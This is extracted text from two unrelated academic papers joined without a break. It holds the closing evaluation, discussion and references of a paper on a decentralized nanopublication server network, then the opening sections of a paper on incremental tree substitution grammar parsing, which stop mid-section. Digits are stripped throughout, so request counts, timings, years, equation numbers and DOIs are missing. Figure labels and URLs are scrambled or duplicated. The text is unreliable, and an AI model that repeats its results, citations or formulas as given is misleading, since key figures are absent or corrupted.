http://dx.doi.org/ . /peerj-cs. ● ● unreliable connection normal connection number of failed attempts to download a nanopublication ●unreliable connection normal connection time to download entire dataset in seconds figure the number of failures and required time when downloading the liddi dataset from the server network over a normal connection as well as a connection that has been artificially made unreli- able. consequently handled about times fewer requests ( ), and started to hit the timeout of s for some requests when more than client accessed it in parallel. in the case of the nanopublication server, the majority of the requests were answered within less than . s for up to around parallel clients, and this value remained below . s all the way up to clients. as the round-trip network latency alone between ireland and zurich amounts to around . to . s, further improvements can be achieved for a denser network due to the reduced distance to the nearest server. for the third part of the evaluation, all forty retrieval attempts succeeded. after normalization of the downloaded datasets, they were all identical, also the ones that were downloaded through an input stream that was artificially made highly unreliable. figure shows the number of retrieval failures and the amount of time that was required for the retrieval. with the normal connection, the downloading of nanopublications from the network almost always succeeded on the first try. of the , nanopublications that had to be downloaded ( , content nanopublications plus nanopublication indexes), fewer than such download attempts failed in of the test runs. in the remaining two runs, the connection happened to be temporarily unreliable for ‘‘natural’’ reasons, and the number of download failures rose to and , , respectively. this, however, had no effect on the success of the download in a timely manner. on average over the test runs, the entire dataset was successfully downloaded in s, with a maximum of s. unsurprisingly, the unreliable connection leads a much larger average number of failures and retries, but these failures have no effect on the final downloaded dataset, as we have seen above. on average, , download attempts failed and had to be retried in the unreliable setting. in particular because half of these failures included a delay of s, the download times are more than doubled, but still in a very reasonable range with an average of s and a maximum below min. in summary, the first part of the evaluation shows that the overall replication capacity of the current server network is around . million new nanopublications per day or . billion per year. the results of the second part show that the load on a server when measured as response times is barely noticeable for up to parallel clients, and therefore kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the network can easily handle ·x parallel client connections or more, where x is the number of independent physical servers in the network (currently x = ). the second part thereby also shows that the restriction of avoiding parallel outgoing connections for the replication between servers is actually a very conservative measure that could be relaxed, if needed, to allow for a higher replication capacity. the third part of the evaluation shows that the client-side retrieval of entire datasets is indeed efficient and reliable, even if the used internet connection or some servers in the network are highly unreliable. discussion and conclusion we have presented here a low-level infrastructure for data sharing, which is just one piece of a bigger ecosystem to be established. the implementation of components that rely on this low-level data sharing infrastructure is ongoing and future work. this includes the development of ‘‘core services’’ (see ‘architecture’) on top of the server network to allow people to find nanopublications and ‘‘advanced services’’ to query and analyze the content of nanopublications. in addition, we need to establish standards and best practices of how to use existing ontologies (and to define new ones where necessary) to describe properties and relations of nanopublications, such as referring to earlier versions, marking nanopublications as retracted, and reviewing of nanopublications. apart from that, we also have to scale up the current small network. as our protocol only allows for simple key-based lookup, the time complexity for all types of requests is sublinear and therefore scales up well. the main limiting factor is disk space, which is relatively cheap and easy to add. still, the servers will have to specialize even more, i.e., replicate only a part of all nanopublications, in order to handle really large amounts of data. in addition to the current surface feature definitions via uri and hash patterns, a number of additional ways of specializing are possible in the future: servers can restrict themselves to particular types of nanopublications, e.g., to specific topics or authors, and communicate this to the network in a similar way as they do it now with uri and hash patterns; inspired by the bitcoin system, certain servers could only accept nanopublications whose hash starts with a given number of zero bits, which makes it costly to publish; and some servers could be specialized to new nanopublications, providing fast access but only for a restricted time, while others could take care of archiving old nanopublications, possibly on tape and with considerable delays between request and delivery. lastly, there could also emerge interesting synergies with novel approaches to internet networking, such as content-centric networking (jacobson et al., ), with which—consistent with our proposal—requests are based on content rather than hosts. we argue that data publishing and archiving can and should be done in a decentralized manner. we believe that the presented server network can serve as a solid basis for semantic publishing, and possibly also for the semantic web in general. it could contribute to improve the availability and reproducibility of scientific results and put a reliable and trustworthy layer underneath the semantic web. kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional information and declarations funding ruben verborgh is a postdoctoral fellow of the research foundation–flanders (fwo). the other authors received no particular funding for this work. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: research foundation–flanders (fwo). competing interests christine chichester is an employee of nestle institute of health sciences, lausanne, switzerland. george giannakopoulos is an employee of scify, a private not-profit company, athens, greece. author contributions • tobias kuhn conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • christine chichester conceived and designed the experiments, reviewed drafts of the paper. • michael krauthammer, núria queralt-rosinach, george giannakopoulos and axel- cyrille ngonga ngomo performed the experiments, reviewed drafts of the paper. • ruben verborgh and raffaele viglianti performed the experiments, wrote the paper, reviewed drafts of the paper. • michel dumontier conceived and designed the experiments, performed the experiments, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: source code: - java library for nanopublications: https://github.com/nanopublication/nanopub-java - nanopublication server: https://github.com/tkuhn/nanopub-server - nanopublication monitor: https://github.com/tkuhn/nanopub-monitor content data: - all datasets: https://datahub.io/organization/nanopublications - https://datahub.io/dataset/disgenet-v - - - -nanopubs - https://datahub.io/dataset/nextprot-preliminary-nanopubs - https://datahub.io/dataset/openbel- - -nanopubs - https://datahub.io/dataset/openbel- -nanopubs - https://datahub.io/dataset/generif-aida-nanopubs - https://datahub.io/dataset/linked-drug-drug-interactions-liddi kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/nanopublication/nanopub-java https://github.com/tkuhn/nanopub-server https://github.com/tkuhn/nanopub-monitor https://datahub.io/organization/nanopublications https://datahub.io/dataset/disgenet-v - - - -nanopubs https://datahub.io/dataset/nextprot-preliminary-nanopubs https://datahub.io/dataset/openbel- - -nanopubs https://datahub.io/dataset/openbel- -nanopubs https://datahub.io/dataset/generif-aida-nanopubs https://datahub.io/dataset/linked-drug-drug-interactions-liddi http://dx.doi.org/ . /peerj-cs. - https://datahub.io/dataset/disgenet-v - - - -nanopubs evaluation data: - repo with data and scripts of conference paper: https://bitbucket.org/tkuhn/ trustypublishing-study/ - repo with some additional content for this extended journal article: https: //bitbucket.org/tkuhn/trustypublishingx-study/. references banda jm, kuhn t, shah nh, dumontier m. . provenance-centered dataset of drug-drug interactions. in: proceedings of the th international semantic web conference (iswc ). berlin heidelberg: springer, – . belhajjame k, corcho o, garijo d, zhao j, missier p, newman d, palma r, bechhofer s, garcıa cuesta e, gómez-pérez jm, kyle g, page k, roos m, ruiz je, soiland- reyes s, verdes-montenegro l, de roure d, goble ca. . workflow-centric research objects: first class citizens in scholarly discourse. in: proceedings of sepublica . ceur-ws. berners-lee t. . linked data—design issues. available at http://www.w .org/ designissues/linkeddata.html. bradley j. . documents and data: modelling materials for humanities research in xml and relational databases. literary and linguistic computing ( ): – doi . /llc/fqh . buil-aranda c, hogan a, umbrich j, vandenbussche py. . sparql web- querying infrastructure: ready for action? in: the semantic web–iswc . berlin heidelberg: springer, – . carroll j, bizer c, hayes p, stickler p. . named graphs, provenance and trust. in: proceedings of www’ . new york: acm, – . chichester c, gaudet p, karch o, groth p, lane l, bairoch a, mons b, loizou a. . querying nextprot nanopublications and their value for insights on sequence variants and tissue expression. web semantics: science, services and agents on the world wide web : – . chichester c, karch o, gaudet p, lane l, mons b, bairoch a. . converting nextprot into linked data and nanopublications. semantic web ( ): – . clarke i, sandberg o, wiley b, hong tw. . freenet: a distributed anonymous in- formation storage and retrieval system. in: designing privacy enhancing technologies. berlin heidelberg: springer, – . cohen jp, lo hz. . academic torrents: a community-maintained distributed repository. in: proceedings of xsede ’ . new york: acm, . feigenbaum l, williams gt, clark kg, torres e. . sparql . protocol recom- mendation w c. available at http://www.w .org/tr/sparql -protocol/ . filali i, bongiovanni f, huet f, baude f. . a survey of structured p p systems for rdf data storage and retrieval. in: transactions on large-scale data- and knowledge- centered systems iii. berlin heidelberg: springer, – . kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://datahub.io/dataset/disgenet-v - - - -nanopubs https://bitbucket.org/tkuhn/trustypublishing-study/ https://bitbucket.org/tkuhn/trustypublishing-study/ https://bitbucket.org/tkuhn/trustypublishingx-study/ https://bitbucket.org/tkuhn/trustypublishingx-study/ http://www.w .org/designissues/linkeddata.html http://www.w .org/designissues/linkeddata.html http://dx.doi.org/ . /llc/fqh http://www.w .org/tr/sparql -protocol/ http://dx.doi.org/ . /peerj-cs. freedman r. . the renaissance chanson goes digital: digitalduchemin. org. early music ( ): – doi . /em/cau . fu k, kaashoek mf, mazières d. . fast and secure distributed read-only file system. acm transactions on computer systems ( ): – doi . / . . golden p, shaw r. . nanopublication beyond the sciences: the periodo period gazetteer. peerj computer science :e doi . /peerj-cs. . gray aj, baran j, marshall ms, dumontier m. . dataset descriptions: hcls community profile. interest group note, w c (may ). available at http://www. w .org/tr/hcls-dataset. groth p, gibson a, velterop j. . the anatomy of a nano-publication. information services and use ( ): – . han l, finin t, parr c, sachs j, joshi a. . rdf : from spreadsheets to rdf. in: proceedings of the th international conference on the semantic web. berlin heidelberg: springer, – . harris s, seaborne a. . sparql . query language recommendation w c. available at http://www.w .org/tr/sparql -query/ . hartig o. . an overview on execution strategies for linked data queries. datenbank- spektrum ( ): – doi . /s - - - . jacobson v, smetters dk, thornton jd, plass m, briggs n, braynard r. . network- ing named content. communications of the acm ( ): – . kuhn t. . a survey and classification of controlled natural languages. computa- tional linguistics ( ): – doi . /coli_a_ . kuhn t. a. nanopub-java: a java library for nanopublications. in: proceedings of the th workshop on linked science (lisc ). kuhn t. b. science bots: a model for the future of scientific computation? in: www companion proceedings. new york: acm, – . kuhn t, barbano pe, nagy ml, krauthammer m. . broadening the scope of nanopublications. in: proceedings of eswc . berlin heidelberg: springer, – . kuhn t, chichester c, krauthammer m, dumontier m. . publishing without publishers: a decentralized approach to dissemination, retrieval, and archiving of data. in: proceedings of the th international semantic web conference (iswc ), lecture notes in computer science. berlin heidelberg: springer. kuhn t, dumontier m. . trusty uris: verifiable, immutable, and permanent digital artifacts for linked data. in: proceedings of eswc . berlin heidelberg: springer, – . kuhn t, dumontier m. . making digital artifacts on the web verifiable and reliable. ieee transactions on knowledge and data engineering ( ): – . kuhn t, royer l, fuchs ne, schroeder m. . improving text mining with controlled natural language: a case study for protein interations. in: proceedings dils’ . berlin heidelberg: springer. ladwig g, harth a. . cumulusrdf: linked data management on nested key-value stores. in: proceedings of ssws . kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /em/cau http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. http://www.w .org/tr/hcls-dataset http://www.w .org/tr/hcls-dataset http://www.w .org/tr/sparql -query/ http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /coli_a_ http://dx.doi.org/ . /peerj-cs. markman c, zavras c. . bittorrent and libraries: cooperative data publishing, man- agement and discovery. d-lib magazine ( ) doi . /march -markman. mccusker jp, lebo t, krauthammer m, mcguinness dl. . next generation cancer data discovery, access, and integration using prizms and nanopublications. in: proceedings of dils . berlin heidelberg: springer, – . miller a, juels a, shi e, parno b, katz j. . permacoin: repurposing bitcoin work for data preservation. in: proceedings of the ieee symposium on security and privacy (sp). piscataway: ieee, – . mons b, van haagen h, chichester c, den dunnen jt, van ommen g, van mulligen e, singh b, hooft r, roos m, hammond j, kiesel b, giardine b, velterop j, groth p, schultes e. . the value of data. nature genetics ( ): – doi . /ng - . np index ra suq e . . linked drug-drug interactions (liddi). nanopublication index. available at http://np.inn.ac/ra suq e ljdkpt eos dkykf ht lfmn aztfsdmrxg. np index racy i f_w. . nanopubs converted from openbel’s small and large corpus . . nanopublication index. available at http://np.inn.ac/racy i f_ wr ol bhnd ekju glf-wp opbdbyve p o. np index rar dwelyl. . nanopubs converted from openbel’s small and large corpus . nanopublication index. available at http://np.inn.ac/ rar dwelylkgsfroclnwhjoj- ngzn_ bw jjxwfzinhw. np index ravekrw m . . nanopubs extracted from disgenet v . . . . nanopublication index. available at http://np.inn.ac/ravekrw m ly_ pjmhcxczmr fyilzzqjowt cgcwd_ c. np index raxflg ym. . nanopubs converted from nextprot protein data (prelimi- nary). nanopublication index. available at http://np.inn.ac/raxflg ymi a su o f ema msp hwys mftvyredezrg. np index raxy hxq. . nanopubs extracted from disgenet v . . . . nanopubli- cation index. available at http://np.inn.ac/raxy hxqhpkpmvpc-wqja kgwiwa- qa dipr lig q. np index ray_lqruua. . aida nanopubs extracted from generif. nanopublica- tion index. available at http://np.inn.ac/ray_lqruuagcytackapptky epitwzeuil ghswgm zwni. paskin n. . digital object identifiers for scientific data. data science journal : – doi . /dsj. . . patrinos gp, cooper dn, van mulligen e, gkantouna v, tzimas g, tatum z, schultes e, roos m, mons b. . microattribution and nanopublication as means to incentivize the placement of human genome variation data into the public domain. human mutation ( ): – doi . /humu. . proell s, rauber a. . a scalable framework for dynamic data citation of arbitrary structured data. in: rd international conference on data management technologies and applications (data ). kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /march -markman http://dx.doi.org/ . /ng - http://np.inn.ac/ra suq e ljdkpt eos dkykf ht lfmnaztfsdmrxg http://np.inn.ac/ra suq e ljdkpt eos dkykf ht lfmnaztfsdmrxg http://np.inn.ac/racy i f_wr ol bhnd ekju glf-wp opbdbyve p o http://np.inn.ac/racy i f_wr ol bhnd ekju glf-wp opbdbyve p o http://np.inn.ac/rar dwelylkgsfroclnwhjoj- ngzn_ bw jjxwfzinhw http://np.inn.ac/rar dwelylkgsfroclnwhjoj- ngzn_ bw jjxwfzinhw http://np.inn.ac/ravekrw m ly_pjmhcxczmr fyilzzqjowt cgcwd_ c http://np.inn.ac/ravekrw m ly_pjmhcxczmr fyilzzqjowt cgcwd_ c http://np.inn.ac/raxflg ymi a su of ema msp hwys mftvyredezrg http://np.inn.ac/raxflg ymi a su of ema msp hwys mftvyredezrg http://np.inn.ac/raxy hxqhpkpmvpc-wqja kgwiwa-qa dipr lig q http://np.inn.ac/raxy hxqhpkpmvpc-wqja kgwiwa-qa dipr lig q http://np.inn.ac/ray_lqruuagcytackapptky epitwzeuilghswgm zwni http://np.inn.ac/ray_lqruuagcytackapptky epitwzeuilghswgm zwni http://dx.doi.org/ . /dsj. . http://dx.doi.org/ . /humu. http://dx.doi.org/ . /peerj-cs. queralt-rosinach n, kuhn t, chichester c, dumontier m, sanz f, furlong li. . publishing disgenet as nanopublications. semantic web—interoperability, usability, applicability ( ): – . sequeda jf, arenas m, miranker dp. . on directly mapping relational databases to rdf and owl. in: proceedings of the st international conference on world wide web. acm, – . speicher s, arwe j, malhotra a. . linked data platform . . recommendation w c. available at https://www.w .org/tr/ldp/ . verborgh r, hartig o, de meester b, haesendonck g, de vocht l, vander sande m, cyganiak r, colpaert p, mannens e, van de walle r. . querying datasets on the web with high availability. in: mika p, tudorache t, bernstein a, welty c, knoblock c, vrandečić d, groth p, noy n, janowicz k, goble c, eds. proceedings of the th international semantic web conference. lecture notes in computer science, vol. . berlin heidelberg: springer, – . wilkinson md, dumontier m, aalbersberg ij, appleton g, axton m, baak a, blomberg n, boiten jw, da silva santos lb, bourne pe, bouwman j, brookes aj, clark t, crosas m, dillo i, dumon o, edmunds s, evelo ct, finkers r, gonzalez- beltran a, gray aj, groth p, goble c, grethe js, heringa j, ’t hoen pa, hooft r, kuhn t, kok r, kok j, lusher sj, martone me, mons a, packer al, persson b, rocca-serra p, roos m, van schaik r, sansone sa, schultes e, sengstag t, slater t, strawn g, swertz ma, thompson m, van der lei j, van mulligen e, velterop j, waagmeester a, wittenburg p, wolstencroft k, zhao j, monsa b. . the fair guiding principles for scientific data management and stewardship. scientific data : doi . /sdata. . . williams aj, harland l, groth p, pettifer s, chichester c, willighagen el, evelo ct, blomberg n, ecker g, goble c, mons b. . open phacts: semantic interoperability for drug discovery. drug discovery today ( ): – doi . /j.drudis. . . . kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.w .org/tr/ldp/ http://dx.doi.org/ . /sdata. . http://dx.doi.org/ . /j.drudis. . . http://dx.doi.org/ . /peerj-cs. incremental tree substitution grammar for parsing and sentence prediction federico sangati and frank keller institute for language, cognition, and computation school of informatics, university of edinburgh crichton street, edinburgh eh ab, uk federico.sangati@gmail.com keller@inf.ed.ac.uk abstract in this paper, we present the first incremental parser for tree substitution grammar (tsg). a tsg allows arbitrarily large syntactic frag- ments to be combined into complete trees; we show how constraints (including lexical- ization) can be imposed on the shape of the tsg fragments to enable incremental process- ing. we propose an efficient earley-based al- gorithm for incremental tsg parsing and re- port an f-score competitive with other incre- mental parsers. in addition to whole-sentence f-score, we also evaluate the partial trees that the parser constructs for sentence prefixes; partial trees play an important role in incre- mental interpretation, language modeling, and psycholinguistics. unlike existing parsers, our incremental tsg parser can generate partial trees that include predictions about the up- coming words in a sentence. we show that it outperforms an n-gram model in predicting more than one upcoming word. introduction when humans listen to speech, the input becomes available gradually as the speech signal unfolds. reading happens in a similarly gradual manner when the eyes scan a text. there is good evidence that the human language processor is adapted to this and works incrementally, i.e., computes an interpre- tation for an incoming sentence on a word-by-word basis (tanenhaus et al., ; altmann and kamide, ). also language processing systems often deal with speech as it is spoken, or text as it is being typed. a dialogue system should start interpreting a sentence while it is being spoken, and a question answering system should start retrieving answers be- fore the user has finished typing the question. incremental processing is therefore essential both for realistic models of human language processing and for nlp applications that react to user input in real time. in response to this, a number of in- cremental parsers have been developed, which use context-free grammar (roark, ; schuler et al., ), dependency grammar (chelba and jelinek, ; nivre, ; huang and sagae, ), or tree- adjoining grammar (demberg et al., ). typical applications of incremental parsers include speech recognition (chelba and jelinek, ; roark, ; xu et al., ), machine translation (schwartz et al., ; tan et al., ), reading time modeling (demberg and keller, ), or dialogue systems (stoness et al., ). another potential use of incre- mental parsers is sentence prediction, i.e., the task of predicting upcoming words in a sentence given a prefix. however, so far only n-gram models and clas- sifiers have been used for this task (fazly and hirst, ; eng and eisner, ; grabski and scheffer, ; bickel et al., ; li and hirst, ). in this paper, we present an incremental parser for tree substitution grammar (tsg). a tsg contains a set of arbitrarily large tree fragments, which can be combined into new syntax trees by means of a sub- stitution operation. an extensive tradition of parsing with tsg (also referred to as data-oriented parsing) exists (bod, ; bod et al., ), but none of the existing tsg parsers are incremental. we show how constraints can be imposed on the shape of the tsg fragments to enable incremental processing. we pro- pose an efficient earley-based algorithm for incre- mental tsg parsing and report an f-score competi- tive with other incremental parsers. transactions of the association for computational linguistics : may, – , . tsg fragments can be arbitrarily large and can contain multiple lexical items. this property enables our incremental tsg parser to generate partial parse trees that include predictions about the upcoming words in a sentence. it can therefore be applied di- rectly to the task of sentence prediction, simply by reading off the predicted items in a partial tree. we show that our parser outperforms an n-gram model in predicting more than one upcoming word. the rest of the paper is structured as follows. in section , we introduce the itsg framework and re- late it to the original tsg formalism. section de- scribes the chart-parser algorithm, while section details the experimental setup and results. sections and present related work and conclusions. incremental tree substitution grammar the current work is based on tree substitu- tion grammar (tsg, schabes ; for a recent overview see bod et al. ). a tsg is composed of (i) a set of arbitrarily large fragments, usually ex- tracted from an annotated phrase-structure treebank, and (ii) the substitution operation by means of which fragments can be combined into complete syntactic analyses (derivations) of novel sentences. every fragment’s node is either a lexical node (word), a substitution site (a non-lexical node in the yield of the structure), or an internal node. an inter- nal node must always keep the same daughter nodes as in the original tree. for an example of a binarized tree and a fragment extracted from it see figure . a tsg derivation is constructed in a top-down generative process starting from a fragment in the grammar rooted in s (the unique non-lexical node all syntactic analysis are rooted in). a partial deriva- tion is extended by subsequently introducing more fragments: if x is the left-most substitution site in the yield of the current partial derivation, a fragment for example nodes np, vp, s@ are the substitution sites of the right fragment in figure . the tree is right-binarized via artificial nodes with @ sym- bols, as explained in section . . the original tree is s . “.” vp vp vbn “disclosed” vbd “were” np nns “terms” s s@ s@ . “.” vp vp vbn “disclosed” vbd “were” np nns “terms” s s@ s@vp vpvbd “were” np figure : an example of a binarized parse tree and a lexicalized fragment extracted from it. rooted in x is chosen from the grammar and sub- stituted into it. when there are no more substitution sites (all nodes in the yield are lexical items) the gen- erative process terminates. . incrementality in this work we are interested in defining an incre- mental tsg (in short itsg). the new generative process, while retaining the original mechanism for combining fragments (by means of the substitution operation), must ensure a way for deriving syntactic analyses of novel sentences in an incremental man- ner, i.e., one word at the time from left to right. more precisely, at each stage of the generative process, the partially derived structure must be connected (as in standard tsg) and have a prefix of the sentence at the beginning of its yield. a partial derivation is con- nected if it has tree shape, i.e., all the nodes are dom- inated by a common root node (which does not nec- essarily have to be the root node of the sentence). for instance, the right fragment in figure shows a possible way of starting a standard tsg derivation which does not satisfy the incrementality constraint: the partial derivation has a substitution site as the first element in its yield. in order to achieve incrementality while maintain- ing connectedness, we impose one further constraint on the type of fragments which are allowed in an itsg: each fragment should be lexicalized, i.e., con- tain at least one word (lexical anchor) at the first or the second position in its yield. allowing more than one substitution site at the beginning of a fragment’s yield would lead to a violation of the incrementality requirement (as will become clear in section . ). the generative process starts with a fragment an- chored in the first word of the sentence being gener- ated. at each subsequent step, a lexicalized fragment is introduced (by means of the substitution opera- tion) to extend the current partial derivation in such a way that the prefix of the yield of the partial struc- ture is lengthened by one word (the lexical anchor of the fragment being introduced). the lexicalization constraint allows a fragment to have multiple lexical items, not necessarily adjacent to one another. this is useful to capture the general ability of tsg to pro- duce in one single step an arbitrarily big syntactic construction ranging from phrasal verbs (e.g., ask someone out), to parallel constructions (e.g., either x or y), and idiomatic expressions (e.g., took me to the cleaners). for an example of a fragment with multiple lexical anchors see the fragment in the mid- dle of figure . . symbolic grammar an itsg is a tuple 〈n ,l ,f , , ,�〉, where n and l are the set of non-lexical and lexical nodes respectively, f is a collection of lexicalized frag- ments, and are two variants of the substitution operation (backward and forward) used to combine fragments into derivations, and � is the stop opera- tion which terminates the generative process. fragments a fragment f ∈ f belongs to one of the three sets finit,f xlex,f y sub: • an initial fragment ( finit ) has the lexical anchor in the first position of the yield, being the initial word of a sentence (the left-most lexical node of the parse tree from which it was extracted). • a lex-first fragment ( f xlex) has the lexical anchor (non sentence-initial) in the first position of the yield, and is rooted in x . • a sub-first fragment ( f ysub) has the lexical an- chor in the second position of its yield, and a substitution site y in the first. fringes we will use fringes (demberg et al., ) as a compressed representation of fragments, a fragment can be both an initial and a lex-first fragment (e.g., if the lexical anchor is a proper noun). we will make use of two separate instances of the same fragment in the two sets. np nns “terms” s s@ s@ . “.” vp vpvbd “were” np vp vbn “disclosed” �s figure : an example of an itsg derivation yielding the tree on the left side of figure . the second and third frag- ment are introduced by means of forward and backward substitution, respectively. in which the internal structure is replaced by a trian- gle ( a or �) and only the root and the yield are vis- ible. it is possible in a grammar that multiple frag- ments map to the same fringe; we will refer to those as ambiguous fringes. we use both vertical ( a , e.g., in figure and ) and horizontal (�) fringe nota- tion. the latter is used for describing the states in our chart-parsing algorithm in section . for instance, the horizontal fringe representation of the right frag- ment in figure is s � np “were” vp s@. incremental derivation an incremental deriva- tion is a sequence of lexicalized fragments 〈 f , f ,..., fn〉 which, combined together in the specified order, give rise to a complete parse tree (see figure for an example). the first fragment f being introduced in the derivation must be an initial fragment, and its lexical anchor constitutes the one- word prefix of the sentence being generated. sub- sequent fragments are introduced by means of the substitution operation, which has two variants: back- ward substitution ( ), which is used to substitute lex-first fragments into the partial derivation gener- ated so far, and forward substitution ( ), which is used to substitute sub-first fragments into the partial derivation. after a number of fragments are intro- duced, a stop operation (�) may terminate the gen- erative process. operations the three itsg operations take place under specific conditions within an incremental derivation, as illustrated in figure and explained hereafter. at a given stage of the generative process (after an initial fragment has been inserted), the con- nected partial structure may or may not have sub- partial structure operation accepted fragment resulting structure terminated y ` lex... `i x α... (backward) x `i+ β... y ` lex... `i+ β... α... no y ` lex... `i (forward) x y `i+ α... x ` lex... `i `i+ α... no y ` lex... `n � (stop) ∅ y # ∅ ` lex... `n # yes figure : schemata of the three itsg operations. all tree structures (partial structure and fragments) are represented in a compact notation, which displays only the root nodes and the yields. the i-th words in the structure’s yield is represented as `i, while α and β stands for any (possibly empty) sequence of words and substitution sites. stitution sites present in its yield. in the first case, a backward substitution ( ) must take place in the following generative step: if x is the left-most sub- stitution site, a new fragment of type f xlex is chosen from the grammar and substituted into x . if the par- tially derived structure has no substitution site (all the nodes in its yield are lexical nodes) and it is rooted in y , two possible choices exist: either the generative process terminates by means of the stop operation (�y ), or the generative process contin- ues. in the latter case a forward substitution ( ) is performed: a new f ysub fragment is chosen from the grammar, and the partial structure is substituted into the left-most substitution site y of the fragment. multiple derivations as in tsg, an itsg may be able to generate the same parse tree in multiple ways: multiple incremental derivations yielding the same tree. figure shows one such example. generative capacity it is useful to clarify the dif- ference between itsg and the more general tsg formalism in terms of generative capacity. although both types of grammar make use of the substitu- tion operation to combine fragments, an itsg im- poses more constraints on (i) the type of fragments which are allowed in the grammar (initial, lex-first, a stop operation can be viewed as a forward substitution when using an artificial sub-first fragment ∅ � y # (stop frag- ment), where # is an artificial lexical node indicating the termi- nation of the sentence. for simplicity, stop fragments are omit- ted in figure and and y is attached to the stop symbol (�y ). s s@ s@ . “.” vp vp vbn “disclosed” vbd “were” np nns “terms” np “terms” s np “were” vp “.” vp “disclosed” �s s “terms” s@ s@ “were” vp “.” vp “disclosed” �s figure : above: an example of a set of fragments ex- tracted from the tree in figure . below: two incremental derivations that generate it. colors (and lines strokes) in- dicate which derivation fragments belong to. and sub-first fragments), and (ii) the generative pro- cess with which fragments are combined (incremen- tally left to right instead of top-down). if we com- pare a tsg and an itsg on the same set of (itsg- compatible) fragments, then there are cases in which the tsg can generate more tree structures than the itsg. in the following, we provide a more formal char- acterization of the strong and weak generative power s x“a” x “c”x x “b” s x “c”x “c”x “c”x “b” “a” figure : left: an example of a cfg with left recursion. right: one of the structures the cfg can generate. of itsg with respects to context-free grammar (cfg) and tsg. (however, a full investigation of this issue is beyond the scope of this paper.) we can limit our analysis to cfg, as tsg is strongly equiv- alent to cfg. the weak equivalence between itsg and cfg is straightforward: for any cfg there is a way to produce a weakly equivalent grammar in greibach normal form in which any production has a right side beginning with a lexical item (aho and ullman, ). the grammar that results from this transformation is an itsg which uses only back- ward substitutions. left-recursion seems to be the main obstacle for strong equivalence between itsg and cfg. as an example, the left side of figure shows a cfg that contains a left-recursive rule. the types of structures this grammar can generate (such as the one given on the right side of the same figure) are characterized by an arbitrarily long chain of rules that can intervene before the second word of the string, “b”, is gener- ated. given the incrementality constraints, there is no itsg that can generate the same set of struc- tures that this cfg can generate. however, it may be possible to circumvent this problem by applying the left-corner transform (rosenkrantz and lewis, ; aho and ullman, ) to generate an equiv- alent cfg without left-recursive rules. . probabilistic grammar in the generative process presented above there are a number of choices which are left open, i.e., which fragment is being introduced at a specific stage of a derivation, and when the generative process ter- minates. a symbolic itsg can be equipped with a probabilistic component which deals with these choices. a proper probability model for itsg needs to define three probability distributions over the three types of fragments in the grammar, such that: ∑ finit∈finit p( finit) = ( ) ∑ f xlex∈f x lex p( f xlex) = (∀x ∈ n ) ( ) p(�y )+ ∑ f ysub∈f y sub p( f ysub) = (∀y ∈ n ) ( ) the probability that an itsg generates a specific derivation d is obtained by multiplying the probabil- ities of the fragments taking part in the derivation: p(d) = ∏ f∈d p( f ) ( ) since the grammar may generate a tree t via multiple derivations d(t) = d ,d ,...,dm, the probability of the parse tree is the sum of the probabilities of the itsg derivations in d(t): p(t) = ∑ d∈d(t) p(d) = ∑ d∈d(t) ∏ f∈d p( f ) ( ) probabilistic itsg parser we introduce a probabilistic chart-parsing algorithm to efficiently compute all possible incremental de- rivations that an itsg can generate given an input sentence (presented one word at the time). the pars- ing algorithm is an adaptation of the earley algo- rithm (earley, ) and its probabilistic instantia- tion (stolcke, ). . parsing chart a tsg incremental derivation is represented in the chart as a sequence of chart states, i.e., a path. for a given fringe in an incremental derivation, there will be one or more states in the chart, depend- ing on the length of the fringe’s yield. this is be- cause we need to keep track of the extent to which the yield of each fringe has been consumed within a derivation as the sentence is processed incremen- tally. at the given stage of the derivation, the states offer a compact representation over the partial struc- tures generated so far. a fringe (state) may occur in multiple derivations (paths): for instance in figure the two derivations will correspond to two separate paths that will converge to the same fringe (state). start(` ) x �` ν : x �•` ν [α,γ,β] α = γ = p(x �` ν) β = β( : x �` •ν) backward substitution(`i) i : kx � λ•y µ [α,γ,β] y �`iν i : iy �•`iν [α′,γ′,β′] α ′ += α ·p(y �`iν) γ ′ = p(y �`iν) forward substitution(`i) i : y � ν• [α,γ,β] x �y `iµ i : x �y •`iµ [α′,γ′,β′] α ′ += α ·p(x �y `iµ) γ ′ += γ ·p(x �y `iµ) β + = β′ ·p(x �y `iµ) completion i : jy �` jν• [α,γ,β] j : kx � λ•y µ [α′,γ′,β′] i : kx � λy •µ [α′′,γ′′,β′′] α ′′ += α′ ·γ γ ′′ += γ′ ·γ β + = β′′ ·γ′ β ′ += β′′ ·γ′′ scan(`i) i : kx � λ•`iµ [α,γ,β] i + : kx � λ`i •µ [α′,γ′,β′] α ′ = α γ ′ = γ β = β′ stop(#) n : y � ν• [α = γ,β] Ø �y # n : Ø �y •# [α′,γ′,β′] α ′ = γ′ = α ·p(�y ) β ′ = β = p(�y ) figure : chart operations with forward (α), inner (γ), and outer (β) probabilities. each state is composed of a fringe and some ad- ditional information which keeps track of where the fringe is located within a path. a chart state can be generally represented as i : kx � λ•µ ( ) where x � λµ is the state’s fringe, greek letters are (possibly empty) sequences of words and substitu- tion sites, and • is a placeholder indicating to which extent the fragment’s yield has been consumed: all the elements in the yield preceding the dot have been already accepted. finally, i and k are indices of words in the input sentence: • i signifies that the current state is introduced after the first i words in the sentence have been scanned. all states in the chart will be grouped according to this index, and will con- stitute state-set i. • k indicates that the fringe associated with the current state was first introduced in the chart after the first k words in the input sentence had been scanned. the index k is therefore called the start index. for instance when generating the first incremental derivation in figure , the parser will pass through state : s � np • “were” vp “.” indicating that the second fringe is introduced right after the parser has scanned the first word in the sentence and before having scanned the second word. . parsing algorithm we will first introduce the symbolic part of the parsing algorithm, and then 